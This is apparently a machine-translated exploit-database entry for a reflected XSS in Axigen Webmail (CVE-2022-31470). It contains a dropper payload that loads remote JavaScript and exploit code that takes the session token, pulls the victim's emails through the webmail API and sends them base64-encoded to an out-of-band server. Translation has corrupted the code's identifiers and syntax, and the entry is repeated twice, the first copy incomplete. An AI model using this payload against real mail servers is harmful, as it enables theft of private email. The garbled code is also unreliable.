#利用title: axigen 10.3.3.47,10.2.3.12-反射XSS
#Google Dork: inurl
asswordwordwordexpired=是
#日期: 2023-08-21
#利用作者: Amirzargham
#供应商homepage: https://www.axigen.com/
#软件link: https://www.axigen.com/mail-server/download/
#版本:(10.5.0–4370C946)和较旧版本的Axigen Webmail
#测试在: Firefox,Chrome
#CVE: CVE-2022-31470
开发
我们使用第二个反射的XS来利用此漏洞,创建一个
恶意链接并窃取用户电子邮件。
滴管代码
此滴管代码,从远程加载并执行JavaScript利用代码
服务器。
');
x=document.createelement('script');
X.Src='https://example.com/exploit.js';
window.addeventlistener('domcontentloaded',function y(){
document.body.appendchild(x)
})//
编码形式
/Index.hsp?m=%27)%3Bx%3Ddocument.CreateElement(%27Script%27)%3BX.SRC%3D%27
利用代码
xhr1=new xmlhttprequest(),xhr2=new xmlhttprequest(),xhr3=new
xmlhttprequest();
oob_server='https://example.com/';
var script_tag=document.createelement('script');
xhr1.open('get','/',true);
xhr1.onreadystatechange=()={
if(xhr1.readystate===xmlhttprequest.done){
_h_cookie=new URL(xhr1.Responseurl).search.split('=')[1];
xhr2.open('patch',
真的);
xhr2.setRequestheader('content-type','application/json');
xhr2.onreadystatechange=()={
if(xhr2.readystate===xmlhttprequest.done){
如果(xhr2.status===401){
script_tag.src=
document.body.appendchild(script_tag);
} 别的{
resp=xhr2.ResponseText;
folderId=json.parse(resp)['mails'] [0] ['folderid'];
xhr3.open('get',
xhr3.onreadystatechange=()={
if(xhr3.readystate===xmlhttprequest.done){
电子邮件=xhr3.ResponseText;
script_tag.src=
document.body.appendchild(script_tag);
}
};
xhr3.send();
}
}
};
var body=json.stringify({isunread: false});
xhr2.send(body);
}
};
xhr1.send();
结合滴管和利用
您可以在某个地方托管利用代码,然后在滴管中解决它
代码。
#Google Dork: inurl
asswordwordwordexpired=是#日期: 2023-08-21
#利用作者: Amirzargham
#供应商homepage: https://www.axigen.com/
#软件link: https://www.axigen.com/mail-server/download/
#版本:(10.5.0–4370C946)和较旧版本的Axigen Webmail
#测试在: Firefox,Chrome
#CVE: CVE-2022-31470
开发
我们使用第二个反射的XS来利用此漏洞,创建一个
恶意链接并窃取用户电子邮件。
滴管代码
此滴管代码,从远程加载并执行JavaScript利用代码
服务器。
');
x=document.createelement('script');
X.Src='https://example.com/exploit.js';
window.addeventlistener('domcontentloaded',function y(){
document.body.appendchild(x)
})//
编码形式
/Index.hsp?m=%27)%3Bx%3Ddocument.CreateElement(%27Script%27)%3BX.SRC%3D%27
利用代码
xhr1=new xmlhttprequest(),xhr2=new xmlhttprequest(),xhr3=new
xmlhttprequest();
oob_server='https://example.com/';
var script_tag=document.createelement('script');
xhr1.open('get','/',true);
xhr1.onreadystatechange=()={
if(xhr1.readystate===xmlhttprequest.done){
_h_cookie=new URL(xhr1.Responseurl).search.split('=')[1];
xhr2.open('patch',
/api/v1/convertations/mq/?_ h=$ {_ h_cookie},真的);
xhr2.setRequestheader('content-type','application/json');
xhr2.onreadystatechange=()={
if(xhr2.readystate===xmlhttprequest.done){
如果(xhr2.status===401){
script_tag.src=
$ {oob_server}?status=session_expireddomain=$ {document.domain};document.body.appendchild(script_tag);
} 别的{
resp=xhr2.ResponseText;
folderId=json.parse(resp)['mails'] [0] ['folderid'];
xhr3.open('get',
/api/v1/对话?folderid=$ {folderid} _h=$ {_ h_cookie},true);xhr3.onreadystatechange=()={
if(xhr3.readystate===xmlhttprequest.done){
电子邮件=xhr3.ResponseText;
script_tag.src=
$ {oob_server}?status=okdomain=$ {document.domain} emails=$ {btoa(emails)};document.body.appendchild(script_tag);
}
};
xhr3.send();
}
}
};
var body=json.stringify({isunread: false});
xhr2.send(body);
}
};
xhr1.send();
结合滴管和利用
您可以在某个地方托管利用代码,然后在滴管中解决它
代码。